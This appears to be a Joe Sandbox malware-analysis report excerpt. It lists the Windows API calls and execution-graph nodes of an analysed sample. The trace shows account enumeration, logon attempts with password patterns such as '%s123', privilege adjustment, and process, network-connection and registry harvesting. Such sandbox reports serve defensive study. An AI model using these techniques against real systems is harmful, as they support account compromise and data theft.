                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040389A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038AD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038B0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038BD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038C0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                            • String ID: 00-->$<Actions $p=5w
                                                                                                                                                                                                            • API String ID: 3028510665-3742188657
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,?,7702DB30), ref: 00402F40
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402F60
                                                                                                                                                                                                            • CoCreateInstance.OLE32(004043F0,00000000,00000001,004041E0,?), ref: 00402F87
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402F9F
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402FBA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402FD8
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402FF6
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040307C
                                                                                                                                                                                                            • CreateFileMappingW.KERNELBASE(?), ref: 00403082
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403088
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040308E
                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004035B6), ref: 004030CD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00404EEC), ref: 00403276
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0040329B
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004032B9
                                                                                                                                                                                                              • Part of subcall function 00402E50: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004030A1,00404ED8), ref: 00402E58
                                                                                                                                                                                                              • Part of subcall function 00402E50: HeapAlloc.KERNEL32(00000000,?,004030A1,00404ED8), ref: 00402E5F
                                                                                                                                                                                                              • Part of subcall function 00402E50: SysAllocString.OLEAUT32(004030A1), ref: 00402E80
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403366
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040336C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403372
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Variant$ClearInit$Alloc$CreateHeapInitializeString$DecrementFileInstanceInterlockedMappingProcessSecurity
                                                                                                                                                                                                            • String ID: cmd.exe$p=5w
                                                                                                                                                                                                            • API String ID: 3029307448-760121691
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7702DB30), ref: 00401DA6
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7702DB30), ref: 00401DC2
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401E08
                                                                                                                                                                                                            • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401E19
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401E3A
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401E45
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401833
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 00401873
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 004018DD
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                              • Part of subcall function 004017F0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401EAA
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401EEA
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401F26
                                                                                                                                                                                                            • SwitchToThread.KERNEL32(?,?,00404D20,?,?,?), ref: 00401F6F
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F95
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                            • String ID: %s1$%s12$%s123
                                                                                                                                                                                                            • API String ID: 1588441251-2882894844
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20112,?,?,00402D7C), ref: 004027B9
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20112), ref: 004027CA
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004027D6
                                                                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 004027E6
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004027EC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                            • String ID: Fri Jun 17 05:52:09 20112$PnEw$explorer.exe$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3001685711-2451428161
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402ED7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300,004035BE,7735E610,00402EBE), ref: 00402EEF
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402EF2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300), ref: 00402EFF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402F02
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004035BE,004035BE,7735E610,00402EBE), ref: 00402F0B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402F0E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004035BE), ref: 00402F1B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402F1E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2629017576-0
                                                                                                                                                                                                            • Opcode ID: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                            • Instruction ID: 47c24e4de567f4ebe007c7ce519db5101e5d5be497eca443f574c4ff2f4d9865
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF0DAB1656211ABEA102BA59E8CF572A6CEF85B82F040525B708F71D0CAB4DC40D67C
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014D4
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,7702DB30), ref: 004014DF
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 00401505
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 00401520
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040152C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401548
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040155A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            • Opcode ID: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                            • Instruction ID: 35ff206d6e877699644ac5607af1a2cdaefe1b2aeb9dd15ae369335d4f3073ea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11C3B25042146BD310DF65DC0899BBBACEBD53A0F00453AFE55A72D0E33499088BEA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                            • Instruction ID: 796e466c09054be0152a46d456eb4211c9760dde1472f6724dae78271da73244
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E80126712003045BC314AB6AAC81696B7DEAB84706341413BEE05F36A2C23AD8048BAC
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                            • Instruction ID: b56d10f3903839679d055e287fe873ff32dc311f96dddc7098b711b9a384a0cf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65E04FB07413045BD714BFB6AD09A1637DD9BC47073968036BB09F21E1DA39C814CA6D

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:3.2%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:85.5%
                                                                                                                                                                                                            Signature Coverage:15.7%
                                                                                                                                                                                                            Total number of Nodes:1075
                                                                                                                                                                                                            Total number of Limit Nodes:25
81222->81233 81225 2c76825 GetProcessHeap HeapAlloc 81225->81215 81226 2c76845 memset lstrcpynA PathAddBackslashA 81225->81226 81226->81231 81227 2c768a5 SetFileAttributesA SetFileAttributesA DeleteFileA 81229 2c768c0 MoveFileExA 81227->81229 81230 2c768ca GetProcessHeap HeapValidate 81227->81230 81228 2c766d0 4 API calls 81228->81231 81229->81230 81230->81231 81232 2c768e0 GetProcessHeap HeapFree 81230->81232 81231->81215 81231->81221 81231->81225 81231->81227 81231->81228 81231->81230 81232->81231 81234 2c76917 SetFileAttributesA RemoveDirectoryA 81233->81234 81235 2c82d24 GetProcessHeap HeapValidate 81233->81235 81234->81215 81235->81234 81236 2c82d3b GetProcessHeap RtlFreeHeap 81235->81236 81236->81234 81237->81113 81238->81115 81240 2c74913 81239->81240 81241 2c74811 _snprintf 81239->81241 81249 2c740f0 GetProcessHeap HeapAlloc 81240->81249 81242 2c7483c 81241->81242 81243 2c74909 RegCloseKey 81241->81243 81244 2c74843 RegQueryValueExA 81242->81244 81246 2c74875 WriteFile 81242->81246 81247 2c7488e WriteFile 81242->81247 81248 2c748b7 WriteFile WriteFile _snprintf 81242->81248 81243->81240 81244->81242 81245 2c74908 81244->81245 81245->81243 81246->81247 81247->81242 81248->81244 81248->81245 81250 2c7412c 81249->81250 81251 2c7411c memset 81249->81251 81252 2c743c4 81250->81252 81253 2c7418d GetTcpTable 81250->81253 81251->81250 81252->81125 81254 2c74200 81253->81254 81255 2c7419f GetProcessHeap HeapValidate 81253->81255 81258 2c74204 GetProcessHeap HeapValidate 81254->81258 81259 2c7422d 81254->81259 81256 2c741af GetProcessHeap HeapFree 81255->81256 81257 2c741bb 81255->81257 81256->81257 81260 2c741c4 GetProcessHeap HeapAlloc 81257->81260 81261 2c741e8 81257->81261 81258->81252 81262 2c74218 GetProcessHeap HeapFree 81258->81262 81263 2c74240 GetProcessHeap HeapAlloc 81259->81263 81268 2c743cd 81259->81268 81260->81261 81264 2c741dc memset 81260->81264 81261->81252 81265 2c741f3 GetTcpTable 81261->81265 81262->81125 81267 2c7425f memset 81263->81267 
81263->81268 81264->81261 81265->81254 81266 2c82d20 4 API calls 81269 2c743d7 81266->81269 81270 2c74274 81267->81270 81268->81266 81269->81125 81270->81270 81271 2c74363 81270->81271 81276 2c74291 81270->81276 81271->81271 81272 2c7438d WriteFile GetProcessHeap HeapValidate 81271->81272 81272->81252 81273 2c743b8 GetProcessHeap HeapFree 81272->81273 81273->81252 81274 2c74000 GetProcessHeap HeapAlloc _snprintf 81274->81276 81275 2c74360 81275->81271 81276->81274 81276->81275 81277 2c7432f GetProcessHeap HeapValidate 81276->81277 81279 2c742c7 htons htons _snprintf GetProcessHeap HeapValidate 81276->81279 81277->81276 81278 2c7433f GetProcessHeap HeapFree 81277->81278 81278->81276 81279->81276 81280 2c74320 GetProcessHeap HeapFree 81279->81280 81280->81276 81282 2c74606 81281->81282 81283 2c74433 Process32First 81281->81283 81282->81127 81284 2c74486 81283->81284 81285 2c7444b 81283->81285 81284->81282 81288 2c744a7 GetProcessHeap HeapAlloc 81284->81288 81285->81282 81286 2c74457 GetHandleInformation 81285->81286 81286->81282 81287 2c7446b 81286->81287 81287->81282 81289 2c74476 CloseHandle 81287->81289 81288->81282 81290 2c744c7 memset 81288->81290 81289->81127 81293 2c744e0 81290->81293 81291 2c744f0 OpenProcess 81292 2c74506 GetModuleFileNameExA 81291->81292 81291->81293 81292->81293 81293->81291 81294 2c74567 _snprintf Process32Next 81293->81294 81294->81291 81295 2c74599 81294->81295 81295->81295 81296 2c745c7 WriteFile GetProcessHeap HeapValidate 81295->81296 81296->81282 81297 2c745fa GetProcessHeap HeapFree 81296->81297 81297->81282 81299 2c74660 NetQueryDisplayInformation 81298->81299 81308 2c74684 81299->81308 81300 2c7476a WriteFile 81304 2c74796 GetProcessHeap HeapValidate 81300->81304 81305 2c747b8 81300->81305 81302 2c746b1 GetProcessHeap HeapAlloc 81306 2c746d0 memset 81302->81306 81302->81308 81303 2c747c1 NetApiBufferFree 81303->81129 81304->81305 81307 2c747ac GetProcessHeap HeapFree 81304->81307 81305->81129 81306->81308 81307->81305 
81308->81300 81308->81302 81308->81303 81309 2c7470f _snprintf 81308->81309 81310 2c7473d NetApiBufferFree 81308->81310 81309->81308 81310->81299 81310->81300 81312 2c82d12 81311->81312 81313 2c82ce6 GetProcessHeap RtlAllocateHeap 81311->81313 81312->81143 81312->81144 81313->81312 81314 2c82d04 memset 81313->81314 81314->81312 81315->81147 81316->81151 81317->81155 81319 2c97b74 memset 81318->81319 81320 2c97b9f 81318->81320 81319->81320 81321 2c97be5 81320->81321 81327 2c97bbe CreateFileA 81320->81327 81322 2c97bf3 GetProcessHeap HeapValidate 81321->81322 81323 2c97c16 GetProcessHeap HeapAlloc 81321->81323 81324 2c97c0d 81322->81324 81325 2c97c02 GetProcessHeap HeapFree 81322->81325 81326 2c97c27 81323->81326 81324->81192 81325->81324 81326->81192 81327->81321 81330 2c97cfb 81328->81330 81329 2c8284f 81341 2c97c50 81329->81341 81330->81329 81330->81330 81331 2c97d57 LocalAlloc 81330->81331 81331->81329 81332 2c97d71 _snprintf FindFirstFileA LocalFree 81331->81332 81333 2c97eeb FindClose 81332->81333 81340 2c97da7 81332->81340 81333->81329 81334 2c97ed7 FindNextFileA 81334->81333 81334->81340 81335 2c97dc6 wsprintfA wsprintfA 81335->81340 81336 2c97e77 memset lstrcpynA 81378 2c97530 81336->81378 81337 2c97ce0 76 API calls 81337->81340 81338 2c97530 76 API calls 81338->81340 81340->81334 81340->81335 81340->81336 81340->81337 81340->81338 81342 2c97c5b 81341->81342 81343 2c97c6a 81341->81343 81342->81193 81344 2c97c6f 81343->81344 81650 2c96ff0 81343->81650 81344->81193 81346 2c97c88 81347 2c97cb3 GetProcessHeap HeapValidate 81346->81347 81348 2c97c97 GetProcessHeap HeapValidate 81346->81348 81350 2c97ccf 81347->81350 81351 2c97cc3 GetProcessHeap HeapFree 81347->81351 81348->81347 81349 2c97ca7 GetProcessHeap HeapFree 81348->81349 81349->81347 81350->81193 81351->81350 81819 2c76570 81352->81819 81354 2c769be 81354->81167 81354->81201 81354->81202 81355 2c7699c GetProcessHeap HeapValidate 81355->81354 81357 2c769b2 GetProcessHeap HeapFree 81355->81357 81357->81354 
81358 2c76963 GetProcessHeap RtlAllocateHeap 81359 2c7698b 81358->81359 81360 2c7697f memset 81358->81360 81359->81355 81360->81359 81836 2c76240 memset memset RegOpenKeyExA 81361->81836 81363 2c824eb 81848 2c839c0 memset 81363->81848 81365 2c82512 81367 2c825a8 81365->81367 81368 2c76570 13 API calls 81365->81368 81366 2c82487 81366->81363 81369 2c824c9 GetProcessHeap HeapValidate 81366->81369 81367->81201 81370 2c8252b 81368->81370 81369->81363 81371 2c824dc GetProcessHeap HeapFree 81369->81371 81370->81367 81372 2c82531 SetFileAttributesA DeleteFileA 81370->81372 81371->81363 81373 2c8257c GetProcessHeap HeapValidate 81372->81373 81374 2c82552 81372->81374 81375 2c8259c 81373->81375 81376 2c82591 GetProcessHeap HeapFree 81373->81376 81374->81373 81375->81201 81376->81375 81377->81177 81379 2c97554 81378->81379 81380 2c97546 81378->81380 81381 2c97568 lstrcpynA 81379->81381 81382 2c9755a 81379->81382 81380->81340 81383 2c9760b 81381->81383 81384 2c9758b 81381->81384 81382->81340 81383->81340 81385 2c975e9 81384->81385 81386 2c975f5 81384->81386 81430 2c97090 81385->81430 81388 2c975fa 81386->81388 81389 2c97606 81386->81389 81528 2c97130 81388->81528 81389->81383 81392 2c9763a 81389->81392 81390 2c975f3 81390->81383 81394 2c97645 lstrcpynA lstrcpynA 81390->81394 81537 2c97210 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 81392->81537 81396 2c97680 81394->81396 81395 2c976b9 lstrcpynA 81397 2c9772b 81395->81397 81396->81395 81396->81396 81441 2c961d0 81397->81441 81400 2c9781b 81404 2c97350 2 API calls 81400->81404 81401 2c9782e 81402 2c97859 81401->81402 81403 2c97848 81401->81403 81406 2c97874 81402->81406 81408 2c97878 81402->81408 81409 2c97867 81402->81409 81405 2c97350 2 API calls 81403->81405 81404->81383 81407 2c9784d 81405->81407 81517 2c97350 81406->81517 81407->81340 81408->81406 81538 2c974c0 10 API calls 81408->81538 81506 2c973c0 GetProcessHeap RtlAllocateHeap 81409->81506 81414 2c978cf 81523 2c96fa0 81414->81523 81415 2c97940 81416 2c9794c 
81415->81416 81539 2c96470 8 API calls 81415->81539 81416->81340 81419 2c9790d 81419->81383 81420 2c961d0 8 API calls 81419->81420 81421 2c9791c 81420->81421 81421->81383 81424 2c96fa0 SetFilePointer 81421->81424 81422 2c97992 81423 2c979a1 memcpy GetProcessHeap HeapAlloc 81422->81423 81540 2c82de0 GetProcessHeap HeapAlloc memset 81422->81540 81428 2c979e2 memset 81423->81428 81429 2c979f2 81423->81429 81427 2c9792e 81424->81427 81427->81383 81427->81422 81428->81429 81429->81340 81429->81429 81431 2c970c2 CreateFileA 81430->81431 81432 2c970b6 81430->81432 81433 2c970e8 81431->81433 81434 2c970dc 81431->81434 81432->81390 81435 2c97130 19 API calls 81433->81435 81434->81390 81436 2c970ed 81435->81436 81437 2c97117 81436->81437 81438 2c970fb GetHandleInformation 81436->81438 81437->81390 81438->81437 81439 2c9710a 81438->81439 81439->81437 81440 2c97110 CloseHandle 81439->81440 81440->81437 81541 2c96e90 81441->81541 81443 2c961e5 81444 2c96e90 8 API calls 81443->81444 81445 2c961f6 81444->81445 81446 2c96e90 8 API calls 81445->81446 81447 2c96207 81446->81447 81448 2c96e90 8 API calls 81447->81448 81449 2c96218 81448->81449 81450 2c96e90 8 API calls 81449->81450 81451 2c9622c 81450->81451 81452 2c96e90 8 API calls 81451->81452 81453 2c96240 81452->81453 81454 2c96e90 8 API calls 81453->81454 81455 2c96254 81454->81455 81456 2c96e90 8 API calls 81455->81456 81457 2c96268 81456->81457 81458 2c96e90 8 API calls 81457->81458 81459 2c9627c 81458->81459 81460 2c96e90 8 API calls 81459->81460 81461 2c96290 81460->81461 81462 2c96e90 8 API calls 81461->81462 81463 2c962a4 81462->81463 81464 2c96e90 8 API calls 81463->81464 81465 2c962b8 81464->81465 81466 2c96e90 8 API calls 81465->81466 81467 2c962cc 81466->81467 81468 2c96e90 8 API calls 81467->81468 81469 2c962e0 81468->81469 81470 2c96e90 8 API calls 81469->81470 81471 2c962f4 81470->81471 81472 2c96e90 8 API calls 81471->81472 81473 2c96308 81472->81473 81474 2c96e90 8 API calls 81473->81474 81475 2c9631c 
